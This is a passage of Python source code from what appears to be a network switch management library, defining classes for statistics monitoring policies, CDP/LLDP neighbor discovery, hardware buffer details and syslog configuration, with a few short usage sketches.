raise TypeError('MonitorStats must be identified by a string')
if stats_family in self.monitor_stats:
            del self.monitor_stats[stats_family]
self.modified = True
def add_target(self, target_obj):
"""
Add a target object.
:param target_obj: target object of type MonitorTarget
"""
self.monitor_target[target_obj.scope] = target_obj
self.modified = True
def remove_target(self, target):
"""
Remove a target object. The object to remove is identified by
a string, e.g 'l1PhysIf'. This string can be found
in the 'MonitorTarget.scope' attribute of the object.
:param target: target to remove.
"""
if not isinstance(target, str):
raise TypeError('MonitorTarget must be identified by a string')
if target in self.monitor_target:
            del self.monitor_target[target]
self.modified = True
def add_collection_policy(self, coll_obj):
"""
Add a collection policy.
:param coll_obj : A collection policy object of type CollectionPolicy
"""
self.collection_policy[coll_obj.granularity] = coll_obj
self.modified = True
def remove_collection_policy(self, collection):
"""
Remove a collection_policy object. The object to remove is identified
by its granularity, e.g. '5min', '15min', etc. This string can be
found in the 'CollectionPolicy.granularity' attribute of the object.
:param collection: CollectionPolicy to remove.
"""
if collection not in CollectionPolicy.granularityEnum:
            raise TypeError(('CollectionPolicy must be identified by its '
                             'granularity'))
        if collection in self.collection_policy:
            del self.collection_policy[collection]
self.modified = True
class MonitorPolicy(BaseMonitorClass):
"""
This class is the top-most container for a monitoring policy that controls
how statistics are gathered. It has immediate children, CollectionPolicy
objects, that control the default behavior for any network element that
uses this monitoring policy. It may optionally have MonitorTarget objects
as children that are used to override the default behavior for a
particular target class such as Interfaces. There can be further
granularity of control through children of the MonitorTarget sub-objects.
Children of the MonitorPolicy will be CollectionPolicy objects that define
the collection policy plus optional MonitorTarget objects that allow finer
grained control over specific target Switch objects such as 'l1PhysIf'
(layer 1 physical interface).
The CollectionPolicy children are contained in a dictionary called
"collection_policy" that is indexed by the granulariy of the
CollectionPolicy, e.g. '5min', '15min', etc.
The MonitorTarget children are contained in a dictionary called
"monitor_target" that is indexed by the name of the target object,
e.g. 'l1PhysIf'.
To make a policy take effect for a particular port, for example, you must
attach that monitoring policy to the port.
Note that the name of the MonitorPolicy is used to construct the dn of the
object in the Switch. As a result, the name cannot be changed.
If you read a policy from the Switch, change the name, and write it back,
it will create a new policy with the new name and leave the old, original
policy, in place with its original name.
A description may be optionally added to the policy.
"""
def __init__(self, policyType, name):
"""
The MonitorPolicy is initialized with simply a policy type and a name.
There are two policy types: 'fabric' and 'access'. The 'fabric'
monitoring policies can be applied to certain MonitorTarget types and
'access' monitoring policies can be applied to other MonitorTarget
types. Initially however, both policies can have l1PhysIf as targets.
        A name must be specified because it is used to build the distinguishing
name (dn) along with the policyType in the Switch. The dn for
"fabric" policies will be /uni/fabric/monfabric-[name] and for "access"
policies it will be /uni/infra/moninfra-[name] in the Switch.
:param policyType: String specifying whether this is a fabric or\
access policy
:param name: String specifying a name for the policy.
"""
policyTypeEnum = ['fabric', 'access']
if policyType not in policyTypeEnum:
raise ValueError('Policy Type must be one of:', policyTypeEnum)
self.name = name
self.policyType = policyType
self.descr = ''
        self.collection_policy = {}
        self.monitor_target = {}
        self._children = []
# assume that it has not been written to Switch. This is cleared if the
# policy is just loaded from Switch or the policy is written to the Switch.
self.modified = True
@classmethod
def get(cls, session):
"""
get() will get all of the monitor policies from the Switch and return
them as a list. It will get both fabric and access (infra) policies
including default policies.
:param session: the instance of Session used for Switch communication
:returns: List of MonitorPolicy objects
"""
result = []
nxObjects = cls._getClass(session, 'monInfraPol')
for data in nxObjects:
name = str(data['monInfraPol']['attributes']['name'])
policyObject = MonitorPolicy('access', name)
policyObject.set_description(data['monInfraPol']['attributes']['descr'])
cls._getPolicy(policyObject, session,
data['monInfraPol']['attributes']['dn'])
result.append(policyObject)
nxObjects = cls._getClass(session, 'monFabricPol')
for data in nxObjects:
name = str(data['monFabricPol']['attributes']['name'])
policyObject = MonitorPolicy('fabric', name)
policyObject.set_description(data['monFabricPol']['attributes']['descr'])
cls._getPolicy(policyObject, session,
data['monFabricPol']['attributes']['dn'])
result.append(policyObject)
return result
@staticmethod
def _getClass(session, nxClass):
"""
Get the class from the Switch
:param session: Session object instance
:param nxClass: string containing classname
:return: JSON dictionary containing class instances
"""
prefix = '/api/node/class/'
suffix = '.json?query-target=self'
class_query_url = prefix + nxClass + suffix
ret = session.get(class_query_url)
data = ret.json()['imdata']
return data
@classmethod
def _getPolicy(cls, policyObject, session, dn):
"""
Get the policy
:param policyObject: policyObject
:param session: Session class instance
:param dn: string containing the distinguished name
:return: None
"""
children = cls._getChildren(session, dn)
for child in children:
if child[0] == 'statsHierColl':
granularity = str(child[1]['attributes']['granularity'])
adminState = str(child[1]['attributes']['adminState'])
retention = str(child[1]['attributes']['histRet'])
collPolicy = CollectionPolicy(policyObject, granularity,
retention, adminState)
collPolicy.set_name(child[1]['attributes']['name'])
collPolicy.set_description(child[1]['attributes']['descr'])
if child[0] in ['monFabricTarget', 'monInfraTarget']:
scope = str(child[1]['attributes']['scope'])
# initially only l1PhysIf is supported as a target
if scope == 'l1PhysIf':
target = MonitorTarget(policyObject, scope)
target.set_name(str(child[1]['attributes']['name']))
target.set_description(str(child[1]['attributes']['descr']))
dn = child[1]['attributes']['dn']
targetChildren = cls._getChildren(session, dn)
for targetChild in targetChildren:
if targetChild[0] == 'statsReportable':
scope = str(targetChild[1]['attributes']['scope'])
scope = MonitorStats.statsDictionary[scope]
statFamily = MonitorStats(target, scope)
child_attr = targetChild[1]['attributes']
statFamily.set_name(str(child_attr['name']))
                            statFamily.set_description(str(child_attr['descr']))
dn = targetChild[1]['attributes']['dn']
statChildren = cls._getChildren(session, dn)
for statChild in statChildren:
if statChild[0] == 'statsColl':
child_stats = statChild[1]['attributes']
granularity = str(child_stats['granularity'])
adminState = str(child_stats['adminState'])
retention = str(child_stats['histRet'])
collPolicy = CollectionPolicy(statFamily,
granularity,
retention,
adminState)
collPolicy.set_name(child_stats['name'])
collPolicy.set_description(child_stats['descr'])
if targetChild[0] == 'statsHierColl':
child_attr = targetChild[1]['attributes']
granularity = str(child_attr['granularity'])
adminState = str(child_attr['adminState'])
retention = str(child_attr['histRet'])
collPolicy = CollectionPolicy(target,
granularity,
retention,
adminState)
collPolicy.set_name(child_attr['name'])
collPolicy.set_description(child_attr['descr'])
@classmethod
def _getChildren(cls, session, dn):
"""
Get the children
:param session: Session instance object
:param dn: string containing the distinguished name
:return: json dictionary containing the children objects
"""
result = []
mo_query_url = '/api/mo/' + dn + '.json?query-target=children'
ret = session.get(mo_query_url)
mo_data = ret.json()['imdata']
for node in mo_data:
for key in node:
result.append((key, node[key]))
return result
def __str__(self):
"""
Return print string.
"""
return self.policyType + ':' + self.name
def flat(self, target='l1PhysIf'):
"""
This method will return a data structure that is a flattened version
of the monitor policy. The flattened version is one that walks through
        the hierarchy of the policy and determines the administrative state and
retention policy for each granularity of each statistics family.
This is done for the target specified, i.e. 'l1PhysIf'
For example, if 'foo' is a MonitorPolicy object, then
flatPol = foo.flat('l1PhysIf') will return a dictionary that looks like
the following:
adminState = flatPol['counter_family']['granularity'].adminState
retention = flatPol['counter_family']['granularity'].retention
The dictionary will have all of the counter families for all of the
granularities and the value returned is the administrative state and
retention value that is the final result of resolving the policy
hierarchy.
:param target: Switch target object. This will default to 'l1PhysIf'
:returns: Dictionary of statistic administrative state and retentions
indexed by counter family and granularity.
"""
class Policy(object):
"""
Policy class
"""
def __init__(self):
self.adminState = 'disabled'
self.retention = 'none'
result = {}
# initialize data structure
for statFamily in MonitorStats.statsFamilyEnum:
result[statFamily] = {}
for granularity in CollectionPolicy.granularityEnum:
result[statFamily][granularity] = Policy()
        # walk through the policy hierarchy and override each
# policy with the more specific one
for granularity in self.collection_policy:
retention = self.collection_policy[granularity].retention
adminState = self.collection_policy[granularity].adminState
for statFamily in MonitorStats.statsFamilyEnum:
result[statFamily][granularity].adminState = adminState
result[statFamily][granularity].retention = retention
# now go through monitor targets
targetPolicy = self.monitor_target[target]
for granularity in targetPolicy.collection_policy:
retention = targetPolicy.collection_policy[granularity].retention
adminState = targetPolicy.collection_policy[granularity].adminState
for statFamily in MonitorStats.statsFamilyEnum:
if adminState != 'inherited':
result[statFamily][granularity].adminState = adminState
if retention != 'inherited':
result[statFamily][granularity].retention = retention
target_stats = targetPolicy.monitor_stats
for statFamily in target_stats:
collection_pol = target_stats[statFamily].collection_policy
for granularity in collection_pol:
retention = collection_pol[granularity].retention
adminState = collection_pol[granularity].adminState
if adminState != 'inherited':
result[statFamily][granularity].adminState = adminState
if retention != 'inherited':
result[statFamily][granularity].retention = retention
# if the lesser granularity is disabled, then the larger granularity
# is as well
for statFamily in MonitorStats.statsFamilyEnum:
disable_found = False
for granularity in CollectionPolicy.granularityEnum:
if result[statFamily][granularity].adminState == 'disabled':
disable_found = True
if disable_found:
result[statFamily][granularity].adminState = 'disabled'
return result
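# Usage sketch (illustrative only): assemble a small monitoring policy in
# memory and flatten it. All names and intervals are arbitrary; MonitorTarget,
# MonitorStats and CollectionPolicy are defined further down in this module
# and are resolved when the function is called.
def _example_flatten_monitor_policy():
    """Build an access policy, override one stats family, and flatten it."""
    policy = MonitorPolicy('access', 'example-policy')
    # default: collect everything at 5 minute granularity, keep 1 day
    CollectionPolicy(policy, '5min', '1d', 'enabled')
    # narrow the scope to physical interfaces and disable ingress packets
    target = MonitorTarget(policy, 'l1PhysIf')
    stats = MonitorStats(target, 'ingrPkts')
    CollectionPolicy(stats, '5min', 'none', 'disabled')
    flat = policy.flat('l1PhysIf')
    return flat['ingrPkts']['5min'].adminState   # 'disabled'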
class MonitorTarget(BaseMonitorClass):
"""
This class is a child of a MonitorPolicy object. It is used to specify a
    scope for applying a monitoring policy. An example scope would be the
    Interface class, meaning that the monitoring policies specified here will
    apply to all Interface class objects (l1PhysIf in the Switch) that use the
parent MonitoringPolicy as their monitoring policy.
Children of the MonitorTarget will be CollectionPolicy objects that define
the collection policy for the specified target plus optional MonitorStats
objects that allow finer grained control over specific families of
statistics such as ingress packets, ingrPkts.
The CollectionPolicy children are contained in a dictionary called
"collection_policy" that is indexed by the granularity of the
CollectionPolicy, e.g. '5min', '15min', etc.
The MonitorStats children are contained in a dictionary called
"monitor_stats" that is indexed by the name of the statistics family,
e.g. 'ingrBytes', 'ingrPkts', etc.
"""
def __init__(self, parent, target):
"""
The MonitorTarget object is initialized with a parent of type
MonitorPolicy, and a target string. Initially, this toolkit only
        supports a target of type 'l1PhysIf'. The 'l1PhysIf' target is a layer
1 physical interface or "port". The MonitorTarget will narrow the
scope of the policy specified by the children of the MonitorTarget to
be only the target class.
:param parent: Parent object that this monitor target is a child.
It must be of type MonitorPolicy
:param target: String specifying the target class for the Monitor
policy.
"""
targetEnum = ['l1PhysIf']
if not type(parent) in [MonitorPolicy]:
raise TypeError(('Parent of MonitorTarget must be one of type'
' MonitorPolicy'))
if target not in targetEnum:
raise ValueError('target must be one of:', targetEnum)
self._parent = parent
self.scope = target
self.descr = ''
self.name = ''
self._parent.add_target(self)
        self.collection_policy = {}
        self.monitor_stats = {}
        self._children = []
# assume that it has not been written to Switch.
# This is cleared if the policy is just loaded from Switch
# or the policy is written to the Switch.
self.modified = True
def __str__(self):
return self.scope
class MonitorStats(BaseMonitorClass):
"""
This class is a child of a MonitorTarget object. It is used to specify
a scope for applying a monitoring policy that is more fine grained than
the MonitorTarget. Specifically, the MonitorStats object specifies a
statistics family such as "ingress packets" or "egress bytes".
"""
statsDictionary = {'eqptEgrBytes': 'egrBytes',
'eqptEgrPkts': 'egrPkts',
'eqptEgrTotal': 'egrTotal',
'eqptEgrDropPkts': 'egrDropPkts',
'eqptIngrBytes': 'ingrBytes',
'eqptIngrPkts': 'ingrPkts',
'eqptIngrTotal': 'ingrTotal',
'eqptIngrDropPkts': 'ingrDropPkts',
'eqptIngrUnkBytes': 'ingrUnkBytes',
'eqptIngrUnkPkts': 'ingrUnkPkts',
'eqptIngrStorm': 'ingrStorm'}
statsFamilyEnum = ['egrBytes', 'egrPkts', 'egrTotal', 'egrDropPkts',
'ingrBytes', 'ingrPkts', 'ingrTotal', 'ingrDropPkts',
'ingrUnkBytes', 'ingrUnkPkts', 'ingrStorm']
def __init__(self, parent, statsFamily):
"""
The MonitorStats object must always be initialized with a parent object
of type MonitorTarget. It sets the scope of its children collection
policies (CollectionPolicy) to a particular statistics family.
The MonitorStats object contains a dictionary of collection policies
called collection_policy. This is a dictionary of children
CollectionPolicy objects indexed by their granularity, e.g. '5min',
'15min', etc.
:param parent: Parent object that this monitor stats object should be
applied to. This must be an object of type MonitorTarget.
:param statsFamily: String specifying the statistics family that the
children collection policies should be applied to.
Possible values are:['egrBytes', 'egrPkts',
'egrTotal', 'egrDropPkts', 'ingrBytes', 'ingrPkts',
'ingrTotal', 'ingrDropPkts', 'ingrUnkBytes',
'ingrUnkPkts', 'ingrStorm']
"""
if not type(parent) in [MonitorTarget]:
raise TypeError(('Parent of MonitorStats must be one of type '
'MonitorTarget'))
if statsFamily not in MonitorStats.statsFamilyEnum:
raise ValueError('statsFamily must be one of:', MonitorStats.statsFamilyEnum)
self._parent = parent
self.scope = statsFamily
self.descr = ''
self.name = ''
self._parent.add_stats(self)
        self.collection_policy = {}
        self._children = []
# assume that it has not been written to Switch. This is cleared if
# the policy is just loaded from Switch or the policy is written to
# the Switch.
self.modified = True
def __str__(self):
return self.scope
class CollectionPolicy(BaseMonitorClass):
"""
This class is a child of a MonitorPolicy object, MonitorTarget object or
a MonitorStats object. It is where the statistics collection policy is
actually specified. It applies to all of the statistics that are at the
scope level of the parent object,
i.e. all, specific to a target, or specific to a statistics family. What
is specified in the CollectionPolicy is the time granularity of the
collection and how much history to retain. For example, the granularity
might be 5 minutes (5min) or 1 hour (1h). How much history to retain is
similarly specified. For example you might specify that it be kept for
10 days (10d) or 2 years (2year).
If the CollectionPolicy is a child of a MonitorStats object, it can
optionally have children that specify the policy for raising threshold
alarms on the fields in the stats family specified in the MonitorStats
object. This has yet to be implemented.
This object is roughly the same as the statsColl and statsHierColl objects
in the Switch.
"""
# this must be in order from small to large
granularityEnum = ['5min', '15min', '1h', '1d',
'1w', '1mo', '1qtr', '1year']
retentionEnum = ['none', 'inherited', '5min', '15min', '1h', '1d',
'1w', '10d', '1mo', '1qtr', '1year', '2year', '3year']
def __init__(self, parent, granularity, retention, adminState='enabled'):
"""
The CollectionPolicy must always be initialized with a parent object
of type MonitorPolicy, MonitorTarget or MonitorStats. The granularity
must also be specifically specified. The retention period can be
specified, set to "none", or set to "inherited". Note that the "none"
value is a string, not the Python None. When the retention period is
set to "none" there will be no historical stats kept. However,
assuming collection is enabled, stats will be kept for
the current time period.
If the retention period is set to "inherited", the value will be
inherited from the less specific policy directly above this one. The
same applies to the adminState value. It can be 'disabled',
'enabled', or 'inherited'. If 'disabled', the current scope of
counters are not gathered. If enabled, they are gathered. If
'inherited', it will be according to the next higher scope.
Having the 'inherited' option on the retention and administrative
        status allows these items to be independently controlled at the current
        stats granularity. For example, you can specify that ingress unknown
        packets are gathered every 15 minutes by adding a collection
        policy that specifies a 15 minute granularity and an adminState of
'enabled' under a MonitorStats object that sets the scope to be
ingress unknown packets. This might override a higher level policy
that disabled collection at a 15 minute interval. However, you can
set the retention in that same object to be "inherited" so that this
specific policy does not change the retention behavior from that of
the higher, less specific, policy.
When the CollectionPolicy is a child at the top level, i.e. of the
MonitorPolicy, the 'inherited' option is not allowed because there
is no higher level policy to inherit from. If this were to happen,
'inherited' will be treated as 'enabled'.
:param parent: Parent object that this collection policy should be
applied to. This must be an object of type MonitorStats,
MonitorTarget, or MonitorPolicy.
:param granularity: String specifying the time collection interval or
granularity of this policy. Possible values are:
['5min', '15min', '1h', '1d', '1w', '1mo', '1qtr',
'1year'].
:param retention: String specifying how much history to retain the
collected statistics for. The retention will be for
time units of the granularity specified. Possible
values are ['none', 'inherited', '5min', '15min',
'1h', '1d', '1w', '10d', '1mo', '1qtr', '1year',
'2year', '3year'].
:param adminState: Administrative status. String to specify whether
stats should be collected at the specified
granularity. Possible values are ['enabled',
'disabled', 'inherited']. The default if not
specified is 'enabled'.
"""
adminStateEnum = ['enabled', 'disabled', 'inherited']
if type(parent) not in [MonitorStats, MonitorTarget, MonitorPolicy]:
raise TypeError(('Parent of collection policy must be one of '
'MonitorStats, MonitorTarget, or MonitorPolicy'))
if granularity not in CollectionPolicy.granularityEnum:
raise ValueError('granularity must be one of:',
CollectionPolicy.granularityEnum)
if retention not in CollectionPolicy.retentionEnum:
raise ValueError('retention must be one of:',
CollectionPolicy.retentionEnum)
if adminState not in adminStateEnum:
raise ValueError('adminState must be one of:',
                             adminStateEnum)
self._parent = parent
self.granularity = granularity
self.retention = retention
self.adminState = adminState
self._children = []
self._parent.add_collection_policy(self)
# assume that it has not been written to Switch. This is cleared if
# the policy is just loaded from Switch or the policy is written to
# the Switch.
self.modified = True
def __str__(self):
return self.granularity
def setAdminState(self, adminState):
"""
Sets the administrative status.
:param adminState: Administrative status. String to specify whether
stats should be collected at the specified
granularity. Possible values are ['enabled',
'disabled', 'inherited']. The default if not
specified is 'enabled'.
"""
if self.adminState != adminState:
self.modified = True
self.adminState = adminState
def setRetention(self, retention):
"""
Sets the retention period.
:param retention: String specifying how much history to retain the
collected statistics for. The retention will be for
time units of the granularity specified. Possible
values are ['none', 'inherited', '5min', '15min',
'1h', '1d', '1w', '10d', '1mo', '1qtr', '1year',
'2year', '3year'].
"""
if self.retention != retention:
self.modified = True
self.retention = retention
class LogicalModel(BaseNXObject):
"""
This is the root class for the logical part of the network.
    Its corollary is the PhysicalModel class.
It is a container that can hold all of logical model instances such
as Tenants.
From this class, you can populate all of the children classes.
"""
def __init__(self, session=None, parent=None):
"""
        Initialization method that sets up the LogicalModel.
:return:
"""
if session:
assert isinstance(session, Session)
super(LogicalModel, self).__init__(name='', parent=parent)
self.session = session
@classmethod
def get(cls, session=None, parent=None):
"""
        Method to get all of the LogicalModels. It will get one and
        return it in a list.
        :param session: Session instance used for switch communication
        :param parent: parent object
        :return: list of LogicalModel
"""
logical_model = LogicalModel(session=session, parent=parent)
return [logical_model]
def populate_children(self, deep=False, include_concrete=False):
"""
This method will populate the children of the fabric. If deep is set
to True, it will populate the entire object tree, both physical and logical.
If include_concrete is set to True, it will also include the concrete models
on the network switches.
:param deep:
:param include_concrete:
:return: list of immediate children objects
"""
if deep:
for child in self._children:
child.populate_children(deep, include_concrete)
return self._children
class LinkNeighbors(BaseNXObject):
"""
    This class represents cdp or lldp neighbor information
"""
def __init__(self, disc_proto='cdp', session=None, attributes=None):
"""
Initialization of cdp and lldp information
:param disc_proto: string contains name of discovery
protocol (cdp, lldp)
:param session: the instance of Session used for switch communication
        :param attributes: A dictionary containing neighbor information
:return:
"""
super(LinkNeighbors, self).__init__(name="")
self._session = session
if attributes is None:
self.attributes = {}
else:
self.attributes = copy.deepcopy(attributes)
self.disc_proto = disc_proto
@classmethod
def _is_feature_enabled(cls, session, f_name=None):
"""
This method will check if the f_name feature is enabled in the
        switch. If enabled, return True; otherwise return False
:param session: the instance of Session used for switch communication
:param f_name: String represents a feature name
:return Boolean value
"""
feature_url = '/api/mo/sys/fm.json?rsp-subtree=full'
resp = session.get(feature_url)
for fm in resp.json()['imdata']:
if fm.get('fmEntity'):
for feature in fm['fmEntity']['children']:
if feature.get('fm'+f_name.title()):
return True
return False
@classmethod
def get(cls, session, disc_proto='auto', module=None, port=None):
"""
Gets cdp or lldp neighbors details depending on disc_proto parameter
:param session: the instance of Session used for switch communication
:param disc_proto: Discovery protocol used for getting neighbors
(default: cdp)
:param module: Module id string. This specifies the module or
slot of the port. (optional)
:param port: Port number. This is the port to read. (optional)
:returns: list of LinkNeighbors object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
if port:
if not isinstance(port, str):
                raise TypeError('When specifying a specific port, the port'
                                ' must be identified by a string')
if not isinstance(module, str):
raise TypeError(('When specifying a specific port, the module'
' must be identified by a string'))
if disc_proto.lower() in ['auto', 'lldp']:
# If discovery protocol is auto or lldp, then check if lldp is
# enabled and use it. If lldp is not enabled use cdp
if LinkNeighbors._is_feature_enabled(session, 'lldp'):
disc_proto = 'lldp'
else:
disc_proto = 'cdp'
else:
            # If any other value is passed in disc_proto, then cdp is used
disc_proto = 'cdp'
iface_name = ''
if module and port:
iface_name = '/if-[eth{0}/{1}]'.format(module, port)
query_url = ('/api/mo/sys/%s/inst%s.json?rsp-subtree=full'
% (disc_proto, iface_name))
neighbors_resp = session.get(query_url)
neighbors = neighbors_resp.json()['imdata']
if module and port:
children = neighbors
elif len(neighbors) > 0:
children = neighbors[0][disc_proto+'Inst']['children']
else:
children = []
resp = []
adj_epg = disc_proto+'AdjEp'
proto_if = disc_proto+'If'
for ch in children:
for sub_ch in ch[proto_if]['children']:
if sub_ch.get(adj_epg):
attributes = {}
attributes['devId'] = str(sub_ch[adj_epg]['attributes']\
['devId'])
attributes['portId'] = str(sub_ch[adj_epg]['attributes']\
['portId'])
attributes['sysName'] = str(sub_ch[adj_epg]['attributes']\
['sysName'])
attributes['ver'] = str(sub_ch[adj_epg]['attributes']\
['ver'])
attributes['cap'] = str(sub_ch[adj_epg]['attributes']\
['cap'])
                    # Currently hold time is not supported
attributes['Hldtme'] = '-'
if disc_proto == 'cdp':
attributes['platId'] = \
str(sub_ch[adj_epg]['attributes']['platId'])
else:
attributes['platId'] = "-"
# attributes['id'] holds local interface
attributes['id'] = str(ch[proto_if]['attributes']['id'])
attributes['operSt'] = str(ch[proto_if]['attributes']\
['operSt'])
resp.append(LinkNeighbors(disc_proto=disc_proto,
session=session,
attributes=attributes))
return resp
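# Usage sketch (illustrative only): print a simple neighbor table. Assumes
# 'session' is an authenticated Session instance; the discovery protocol is
# picked automatically (lldp if the feature is enabled, cdp otherwise).
def _example_print_neighbors(session):
    """Print local port, neighbor device and neighbor port for each adjacency."""
    for neighbor in LinkNeighbors.get(session):
        att = neighbor.attributes
        print('%-12s %-20s %s' % (att['id'], att['devId'], att['portId']))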
class HardwareInternal(object):
"""
This class defines hardware internal details
"""
def __init__(self, parent):
self._parent = parent
def buff_pkt_details(self, session):
"""
:param session: Session object
        :return: JSON output of buffer packet details
"""
command = 'show hardware internal buffer info pkt-stats detail'
return session.post_nxapi(command).text
def get(self, session=None):
"""
:param session: Session object
        :return: HardwareInternal object populated with buffer details, or None
"""
if not session:
session = self._parent._session
resp = self.buff_pkt_details(session)
buffer_info = json.loads(resp)['ins_api']['outputs']['output']\
['body']['TABLE_module']['ROW_module']
module_number = buffer_info['module_number']
if module_number:
hardware_int = HardwareInternal(session)
hardware_int.buffer = {}
hardware_int.buffer['total_instant'] = []
hardware_int.buffer['rem_instant'] = []
hardware_int.buffer['switch_cell'] = []
hardware_int.buffer['max_cell'] = []
pars = buffer_info['TABLE_instance']['ROW_instance']
            for index in range(1, 5):
total_ins = "total_instant_usage_" + str(index)
rem_ins = "rem_instant_usage_" + str(index)
max_cel = "max_cell_usage_" + str(index)
switch_cel = "switch_cell_count_" + str(index)
hardware_int.buffer['total_instant'].append(pars[total_ins])
hardware_int.buffer['rem_instant'].append(pars[rem_ins])
hardware_int.buffer['max_cell'].append(pars[max_cel])
hardware_int.buffer['switch_cell'].append(pars[switch_cel])
return hardware_int
class Hardware(BaseNXObject):
"""
This class defines Hardware.
"""
def __init__(self, session=None):
self.internal = HardwareInternal(self)
self._session = session
@classmethod
def get(cls, session, type='nxapi'):
"""
:param session: Session object
        :param type: String defining the type of REST call (default: 'nxapi')
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
if type == 'nxapi':
return Hardware(session)
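# Usage sketch (illustrative only): read buffer statistics through the NX-API
# path used by HardwareInternal. Assumes 'session' is an authenticated Session
# instance; HardwareInternal.get() may return None when no module data exists.
def _example_buffer_usage(session):
    """Return the per-instance total buffer usage, or None if unavailable."""
    hardware = Hardware.get(session)
    internal = hardware.internal.get()
    if internal is None:
        return None
    return internal.buffer['total_instant']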
class LogTimeStamp(object):
"""
This class defines timestamp logging
"""
def __init__(self, session=None, parent=None, format='seconds'):
self._session= session
self._parent = parent
self.format= format
self.object = 'syslogTimeStamp'
def get(self, session=None):
"""
:param session: Session object to communicate with Switch
:return LogTimeStamp object
"""
query_url = '/api/mo/sys/syslog/timestamp.json'
if not session:
session = self._session
resp = session.get(query_url).json()['imdata']
for ret in resp:
format = ret[self.object]['attributes']['format']
return LogTimeStamp(format=format)
def _get_attributes(self):
att = {}
att['format'] = self.format
return att
def get_json(self):
return { self.object: { "attributes": self._get_attributes()}}
class LogMonitor(object):
"""
This class defines Monitor logging
"""
def __init__(self, session=None, parent=None,
admin_st='enabled', severity='notifications'):
self._session= session
self._parent = parent
self.admin_st = admin_st
self.severity = severity
# monitor logging object name
self.object = 'syslogTermMonitor'
def get(self, session=None):
if not session:
session = self._session
query_url = '/api/mo/sys/syslog/monitor.json'
resp = session.get(query_url).json()['imdata']
for ret in resp:
admin_st = ret[self.object]['attributes']['adminState']
severity = ret[self.object]['attributes']['severity']
return LogMonitor(admin_st=admin_st, severity=severity)
def _get_attributes(self):
att = {}
att['adminState'] = self.admin_st
att['severity'] = self.severity
return att
def get_json(self):
return { self.object: { "attributes": self._get_attributes()}}
class LogConsole(object):
"""
This class defines logging console
"""
def __init__(self, session=None, parent=None,
admin_st='enabled', severity='critical'):
self._session= session
self._parent = parent
self.admin_st = admin_st
self.severity = severity
# Base class object name for console logging
self.object = 'syslogConsole'
def get(self, session=None):
query_url = '/api/mo/sys/syslog/console.json'
if not session:
session = self._session
resp = session.get(query_url).json()['imdata']
for ret in resp:
admin_st = ret[self.object]['attributes']['adminState']
severity = ret[self.object]['attributes']['severity']
return LogConsole(admin_st=admin_st, severity=severity)
def _get_attributes(self):
att = {}
att['adminState'] = self.admin_st
att['severity'] = self.severity
return att
def get_json(self):
return { self.object: { "attributes": self._get_attributes()}}
class LogServer(object):
"""
This class defines server logging
"""
def __init__(self, session=None, parent=None,
host=None, severity='notifications', vrf_name='',
fwd_facility='local7'):
self._session= session
self._parent = parent
self.host = host
self.severity = severity
self.vrf_name = vrf_name
self.fwd_facility = fwd_facility
self.object = 'syslogRemoteDest'
def get(self, session=None):
"""
:param session: Session object to communicate with Switch
:return LogServer object
"""
query_url = '/api/node/class/syslogSyslog.json?rsp-subtree=full'
if not session:
session = self._session
resp = session.get(query_url).json()['imdata']
for ret in resp:
children = ret['syslogSyslog']['children']
for child in children:
if child.get(self.object):
host = child[self.object]['attributes']['host']
severity = child[self.object]['attributes']['severity']
vrf_name = child[self.object]['attributes']['vrfName']
fwd_facility = child[self.object]['attributes']\
['forwardingFacility']
return LogServer(host=host, severity=severity,
vrf_name=vrf_name,
fwd_facility=fwd_facility)
def _get_attributes(self):
att = {}
att['host'] = self.host
att['severity'] = self.severity
att['vrfName'] = self.vrf_name
att['forwardingFacility'] = self.fwd_facility
return att
def get_json(self):
return { self.object: { "attributes": self._get_attributes()}}
class LogSourceInterface(object):
"""
This class defines source interface logging
"""
def __init__(self, session=None, parent=None,
admin_st='enabled', if_name='unspecified'):
self._session= session
self._parent = parent
self.admin_st = admin_st
self.if_name = if_name
self.object = 'syslogSourceInterface'
def get(self, session=None):
"""
:param session: Session object to communicate with Switch
:return LogSourceInterface object
"""
query_url = '/api/mo/sys/syslog/source.json'
if not session:
session = self._session
resp = session.get(query_url).json()['imdata']
for ret in resp:
admin_st = ret[self.object]['attributes']['adminState']
if_name = ret[self.object]['attributes']['ifName']
return LogSourceInterface(admin_st=admin_st, if_name=if_name)
def _get_attributes(self):
att = {}
att['adminState'] = self.admin_st
att['ifName'] = self.if_name
return att
def get_json(self):
return { self.object: { "attributes": self._get_attributes()}}
class LogLevel(object):
"""
This class defines log level
"""
def __init__(self, session=None, parent=None,
facility=None, severity='errors'):
self._session= session
self._parent = parent
self.facility = facility
self.severity = severity
self.object = 'syslogLevel'
def get(self, session=None):
"""
:param session: Session object to communicate with Switch
:return LogLevel object
"""
query_url = '/api/node/class/syslogSyslog.json?rsp-subtree=full'
if not session:
session = self._session
resp = session.get(query_url).json()['imdata']
for ret in resp:
children = ret['syslogSyslog']['children']
for child in children:
if child.get(self.object):
facility = child[self.object]['attributes']['facility']
severity = child[self.object]['attributes']['severity']
return LogLevel(facility=facility, severity=severity)
def _get_attributes(self):
att = {}
att['facility'] = self.facility
att['severity'] = self.severity
return att
def get_json(self):
return {self.object : { "attributes" : self._get_attributes()}}
class Logging(BaseNXObject):
"""
This is the parent class for all the logging classes
"""
def __init__(self, session=None, parent=None):
super(Logging, self).__init__(name="logging")
self._session = session
self._parent = parent
self._children = []
# Base syslog object
self.object = 'syslogSyslog'
self.timestamp = LogTimeStamp(session=session, parent=self)
self.level = LogLevel(session=session, parent=self)
self.server = LogServer(session=session, parent=self)
self.monitor = LogMonitor(session=session, parent=self)
self.src_iface = LogSourceInterface(session=session, parent=self)
self.console = LogConsole(session=session, parent=self)
def add_log(self, log_obj=None):
self._children.append(log_obj)
def get_json(self):
return super(Logging, self).get_json(self.object)
def get_url(self, fmt='json'):
return '/api/mo/sys/syslog.' + fmt
@classmethod
def get(cls, session=None):
"""
:param session: Session object used to communicate with Switch
:return Logging object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
return Logging(session=session)
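# Usage sketch (illustrative only): assemble a syslog configuration payload.
# The server address, VRF and severities are made-up values, and the sketch
# assumes that BaseNXObject.get_json() (defined earlier in this module)
# serializes objects attached via add_log(); nothing is sent to a switch here.
def _example_logging_payload(session):
    """Return (url, json) for a console plus remote-server syslog config."""
    log = Logging(session=session)
    log.add_log(LogConsole(admin_st='enabled', severity='critical'))
    log.add_log(LogServer(host='10.0.0.1', severity='notifications',
                          vrf_name='management'))
    return log.get_url(), log.get_json()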
class BreakoutPort(object):
"""
This class defines breakout ports
"""
def __init__(self, id=None, map=None, session=None, parent=None):
